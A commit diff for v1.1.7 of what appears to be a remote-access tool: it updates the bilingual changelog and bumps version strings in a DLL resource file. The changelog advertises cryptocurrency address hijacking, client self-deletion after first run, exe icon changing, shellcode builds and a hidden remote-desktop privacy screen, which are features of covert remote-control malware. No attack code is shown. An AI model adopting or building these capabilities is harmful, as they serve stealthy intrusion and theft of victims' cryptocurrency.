Release v1.1.7
This commit is contained in:
12
ReadMe.md
12
ReadMe.md
@@ -345,6 +345,18 @@ Release v1.1.4
|
||||
* 功能:新增客户端 shellcode 构建选项
|
||||
* 功能:支持多个远程显示器(视频墙)
|
||||
|
||||
**2025.10.12**
|
||||
|
||||
发布版本 v1.1.7:
|
||||
|
||||
增加新工具、自动删除客户端、修复 IP 问题,并加入私有远程桌面代码。
|
||||
|
||||
* 功能:添加数字货币地址劫持功能(仅供研究)
|
||||
* 功能:#193 首次运行后自动删除客户端
|
||||
* 功能:添加用于更改 exe 文件图标的工具菜单
|
||||
* 修复:#195 客户端获取公网 IP 失败
|
||||
* 功能:添加卸载客户端程序的菜单
|
||||
* 功能:添加远程桌面隐私屏幕源代码
|
||||
|
||||
---
|
||||
|
||||
|
||||
13
ReadMe_EN.md
13
ReadMe_EN.md
@@ -355,6 +355,19 @@ This update adds client compression and build options, supports multiple display
|
||||
* Feature: Add client shellcode building option
|
||||
* Feature: Supports multiple remote displays (video wall)
|
||||
|
||||
**2025.10.12**
|
||||
|
||||
Release v1.1.7
|
||||
|
||||
This version adds new tools, auto client deletion, IP fix, and private remote desktop code.
|
||||
|
||||
* Feature: Add digital coin hack feature (research only)
|
||||
* Feature: #193 Automatically delete client after first running
|
||||
* Feature: Add tool menu for changing exe file icon
|
||||
* fix: #195 Client get public IP failed
|
||||
* Feature: Add a menu to uninstall client program
|
||||
* Feature: Add private remote desktop source code
|
||||
|
||||
---
|
||||
|
||||
# 6. Related Projects
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -88,7 +88,7 @@ IDR_WAVE WAVE "Res\\msg.wav"
|
||||
//
|
||||
|
||||
VS_VERSION_INFO VERSIONINFO
|
||||
FILEVERSION 1,0,1,5
|
||||
FILEVERSION 1,0,1,7
|
||||
PRODUCTVERSION 1,0,0,1
|
||||
FILEFLAGSMASK 0x3fL
|
||||
#ifdef _DEBUG
|
||||
@@ -106,7 +106,7 @@ BEGIN
|
||||
BEGIN
|
||||
VALUE "CompanyName", "FUCK THE UNIVERSE"
|
||||
VALUE "FileDescription", "A GHOST"
|
||||
VALUE "FileVersion", "1.0.1.5"
|
||||
VALUE "FileVersion", "1.0.1.7"
|
||||
VALUE "InternalName", "ServerDll.dll"
|
||||
VALUE "LegalCopyright", "Copyright (C) 2019-2025"
|
||||
VALUE "OriginalFilename", "ServerDll.dll"
|
||||
|
||||
Binary file not shown.
Reference in New Issue
Block a user